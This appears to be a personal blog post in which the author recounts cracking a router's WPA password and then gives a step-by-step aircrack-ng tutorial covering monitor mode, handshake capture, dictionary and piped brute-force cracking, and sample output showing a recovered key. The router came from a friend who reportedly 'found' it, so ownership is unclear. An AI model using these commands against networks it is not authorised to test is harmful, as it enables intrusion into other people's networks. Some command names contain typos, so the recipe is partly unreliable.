Crack WiFi Passwords with aircrack

Cracked my first wireless network today. A friend I made at a phone unlocking shop here in Kono district had a NetGear router he "found" and he couldn't reset the password to use it. I wanted to try to see if I could get into it myself before just restoring it to factory defaults. A few hours later with aircrack and its docs, I got as far as starting a brute-force attack on the router with a huge dictionary word list. Having made it far enough to just let it sit for the next 24 hours and crack, I decided to just reset the router to its factory defaults make the password an extremely secure "aaaaa123" and then let it run its course for a few minutes. And Voila, cracked it!

Make sure to run everything with root privileges.

Put your wireless card into "monitor" mode (normally in "managed")

$ sudo ifconfig wlan0 down
$ sudo iwconfif wlan0 mode monitor
$ sudo ifconfig wlan0 up

Start listening on your wlan0 interface

$ airmon-ng start wlan0

Begin sniffing packets to see available Access points and their MAC addresses

$ airodump-ng wlan0

Get a password handshake by capturing packets and saving into a specified file to be used later.

$ airodump-ng --channel <the AP channel> --bssid <MAC of AP> --write some_file_name mon0

Brute-force the Access Point with a dictionary of passwords.

$ aircrack-ng -b <MAC of AP> -w <worldlist file> some_file_name.cap

If you don't have a dictionary file you can use wordfield to generate passwords and pipe them in.

$ wordfield -a -n 8 10 | sudo aircrack-ng -w - -b <MAC of AP> your-cap-file.cap -K

Results from a later test

                           Aircrack-ng 1.1

              [00:16:00] 1588024 keys tested (1668.83 k/s)

                    KEY FOUND! [ jeffnetwork ]

Master Key     : 6D 02 BB DB 2C 6C 59 51 1E 35 E1 D3 A5 C0 5F 8A
                 F3 A7 BB 1A DF DF 5A 3F C8 74 DB 6F DF 58 63 66

Transient Key  : 06 BC D9 30 12 74 1A 25 A8 3A E6 1B 14 EC 71 05
                 F3 6E 51 C5 A0 8E A1 63 2D 07 3A 2D C5 A0 15 A9
                 A8 3E 76 D7 99 51 5C 20 DC 1C A9 E3 FD 77 22 5F
                 5E F8 A5 65 EB 88 A7 AB AB 6F 56 A6 28 14 4F E2

EAPOL HMAC     : 93 44 CA 90 0E 15 04 B5 49 E9 10 FB FF 2A 54 AF

Note: Hacking someones password is illegal, so make sure to abide by the laws set in place by your local law enforcement agency and all that.

Comments !


Started writing one year ago, the day after heading out to travel around the world for a year without a cause.
Current Location: New York, New York

Mexico City, Mexico
Tokyo, Japan
Hanoi, Vietnam
Vientiane, Laos
Phuket, Thailand
Kathmandu, Nepal
Rajastan, India
Kerala, India
Mumbai, India
Freetown, Sierra Leone
Koidu, Sierra Leone
Mombasa, Kenya
Nairobi, Kenya
Kigali, Rwanda
Rwinkwavu, Rwanda
Boston, MA

Latest Posts

Port Forward an old Airport Express

If Developers Took Steroids

We Need Elon Musk

Crossword Scraper

Git Conflicts in your Binary Files

Japanese Sidewalk Interfaces

Introducing Kickbacker

Real Life: Google Glass Done Wrong

Tux Trashcans

How Angry are your Developers?

A 500 Startups Model for the Art World

Unsubscribe from Black Friday/Cyber Monday

Copyrighting Art into Obscurity

Crack WiFi Passwords with aircrack

Using Sandy as an Excuse to Email Spam Customers